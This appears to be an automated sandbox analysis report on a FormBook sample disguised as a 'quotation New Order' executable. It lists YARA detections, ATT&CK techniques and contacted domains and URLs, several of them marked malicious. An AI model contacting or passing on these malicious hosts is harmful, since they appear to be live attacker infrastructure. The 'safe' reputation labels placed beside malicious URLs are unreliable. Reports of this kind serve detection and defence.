Source: Yara match	File source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Valid Accounts1	LSASS Memory	Security Software Discovery241	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection612	Access Token Manipulation1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Virtualization/Sandbox Evasion31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion31	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection612	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	System Information Discovery125	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
quotation New Order I5117.exe	23%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.0.quotation New Order I5117.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.0.quotation New Order I5117.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.0.quotation New Order I5117.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.2.quotation New Order I5117.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.sajatypeworks.comiv	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.thetanheroes.com/n8bs/?4hJLWJ=PuetlOwZFpkKGCq/MJJLd9AYausHszI4yXIJtu+5frxDpsbSPvktMbNWt5V8r6CNrXXm&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/sis	0%	Avira URL Cloud	safe
http://www.jypmore.quest/n8bs/?4hJLWJ=7H0yjhDg+a+MHwvOt9FlC9FT4fPPwk985azmZpRe8o0S6swRDJgGtBdFue+HEp9ACtz2&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.tiro.comng	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://fontfabrik.comos	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.pinnaclecorporaterentals.com/n8bs/?4hJLWJ=klWsC1oO4pFLOH/ubbPBsuuNG6ECcuE/tWLY9Ci8D79EoLLMyfySTrTS/TXNAHCZkRkB&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/n8bs/?4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les/exvmn3T3lrgLyL2qaFXU4A/SjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/find_a_tutor.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.indianasheriffs.biz/Healthy_Weight_Loss.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/fashion_trends.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm	0%	Avira URL Cloud	safe
http://www.typography.net	0%	URL Reputation	safe
http://www.indianasheriffs.biz/Top_10_Luxury_Cars.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw	0%	Avira URL Cloud	safe
http://www.myveguiolcusbyopappgroup.com/n8bs/?4hJLWJ=P1PWYcL+/hkTuAmEUVew+E7DjpBsgHpPBHkumuCE+t//nspYDrLxOzxmHnBKSVqws4Kv&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/pics/7985/logo.png	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/face	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.goodfont.co.kra	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.Eo	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmU	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/W	0%	URL Reputation	safe
http://www.indianasheriffs.biz/Best_Penny_Stocks.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwd	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/G-	0%	Avira URL Cloud	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.sandoll.co.kr.krL	0%	Avira URL Cloud	safe
http://www.eduardoleonsilva.com/n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/M	0%	URL Reputation	safe
http://www.indianasheriffs.biz/Anti_Wrinkle_Creams.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/display.cfm	0%	Avira URL Cloud	safe
http://www.fontbureau.comicTF	0%	Avira URL Cloud	safe
http://www.carterandcone.comOo	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/Best_Mortgage_Rates.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
www.myveguiolcusbyopappgroup.com/n8bs/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.zhongyicts.com.cnl	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.Indianasheriffs.biz	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/7985/netsol-logos.jpg	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/Online_classifieds.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.zahad-riedel.com/n8bs/?4hJLWJ=iaKVfi2UNf7U4ghXoaW8pCxH8k1QKwprWVQ4tf6BluLH39GjhhtZKTymn1Siq8RobrxN&Mtx=0PvL86-xjV	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/js/min.js?v2.3	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/adnl	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ogra	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/Contact_Lens.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/s-c	0%	Avira URL Cloud	safe
http://www.tiro.com_	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/Accident_Lawyers.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdE	0%	Avira URL Cloud	safe
http://www.carterandcone.comv-s	0%	Avira URL Cloud	safe
http://www.indianasheriffs.biz/song_lyrics.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm292	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.zahad-riedel.com	185.30.32.154	true	true	unknown
www.indianasheriffs.biz	208.91.197.39	true	true	unknown
zhs.zohosites.com	136.143.191.204	true	false	high
eduardoleonsilva.com	162.241.2.141	true	true	unknown
thetanheroes.com	15.197.142.173	true	true	unknown
www.myveguiolcusbyopappgroup.com	162.144.34.39	true	true	unknown
www.jypmore.quest	37.123.118.150	true	true	unknown
payperlivecalls.com	34.102.136.180	true	true	unknown
www.thetanheroes.com	unknown	unknown	true	unknown
www.afgelocal2741.com	unknown	unknown	true	unknown
www.eduardoleonsilva.com	unknown	unknown	true	unknown
www.pinnaclecorporaterentals.com	unknown	unknown	true	unknown
www.mermadekusse.store	unknown	unknown	true	unknown
www.payperlivecalls.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.thetanheroes.com/n8bs/?4hJLWJ=PuetlOwZFpkKGCq/MJJLd9AYausHszI4yXIJtu+5frxDpsbSPvktMbNWt5V8r6CNrXXm&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
http://www.jypmore.quest/n8bs/?4hJLWJ=7H0yjhDg+a+MHwvOt9FlC9FT4fPPwk985azmZpRe8o0S6swRDJgGtBdFue+HEp9ACtz2&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
http://www.pinnaclecorporaterentals.com/n8bs/?4hJLWJ=klWsC1oO4pFLOH/ubbPBsuuNG6ECcuE/tWLY9Ci8D79EoLLMyfySTrTS/TXNAHCZkRkB&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/n8bs/?4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les/exvmn3T3lrgLyL2qaFXU4A/SjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
http://www.myveguiolcusbyopappgroup.com/n8bs/?4hJLWJ=P1PWYcL+/hkTuAmEUVew+E7DjpBsgHpPBHkumuCE+t//nspYDrLxOzxmHnBKSVqws4Kv&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
http://www.eduardoleonsilva.com/n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown
www.myveguiolcusbyopappgroup.com/n8bs/	true	Avira URL Cloud: safe	low
http://www.zahad-riedel.com/n8bs/?4hJLWJ=iaKVfi2UNf7U4ghXoaW8pCxH8k1QKwprWVQ4tf6BluLH39GjhhtZKTymn1Siq8RobrxN&Mtx=0PvL86-xjV	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.sajatypeworks.comiv	quotation New Order I5117.exe, 00000001.00000003.276699598.00000000064AB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.networksolutions.com/legal/static-service-agreement.jsp	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.tiro.com	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279168225.0000000006492000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/sis	quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.tiro.comng	quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.comos	quotation New Order I5117.exe, 00000001.00000003.277430713.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277385231.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277406552.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com	quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.indianasheriffs.biz/find_a_tutor.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	quotation New Order I5117.exe, 00000001.00000003.277430713.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277385231.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277406552.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.indianasheriffs.biz/Healthy_Weight_Loss.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/fashion_trends.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.net	quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.indianasheriffs.biz/Top_10_Luxury_Cars.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://customersupport.networksolutions.com/article.php?id=306	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/7985/logo.png	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/face	quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kra	quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.networksolutions.com/	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.zhongyicts.com.cno.Eo	quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmU	quotation New Order I5117.exe, 00000001.00000002.300826914.0000000001967000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://www.register.com/?trkID=WSTm3u15CW	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	quotation New Order I5117.exe, 00000001.00000002.304220539.0000000006490000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.299637951.0000000006490000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/W	quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.indianasheriffs.biz/Best_Penny_Stocks.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwd	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/G-	quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comF	quotation New Order I5117.exe, 00000001.00000003.287151718.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.287020911.0000000006496000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr.krL	quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/M	quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.indianasheriffs.biz/Anti_Wrinkle_Creams.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/display.cfm	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comicTF	quotation New Order I5117.exe, 00000001.00000002.304220539.0000000006490000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.299637951.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comOo	quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/Best_Mortgage_Rates.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.282877904.000000000649E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.register.com/whois.rcmx?domainName=Indianasheriffs.biz	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.networksolutions.com/legal/legal-notice.jsp	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.carterandcone.coml	quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cnl	quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/	quotation New Order I5117.exe, 00000001.00000003.278846260.00000000064CD000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279061521.0000000006495000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279149208.000000000649B000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279061521.0000000006495000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.Indianasheriffs.biz	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/pics/7985/netsol-logos.jpg	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/Online_classifieds.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/js/min.js?v2.3	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/adnl	quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ogra	quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.register.com?trkID=WSTm3u15CW	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false		high
http://www.fontbureau.com/designers8	quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	false		high
http://www.indianasheriffs.biz/Contact_Lens.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
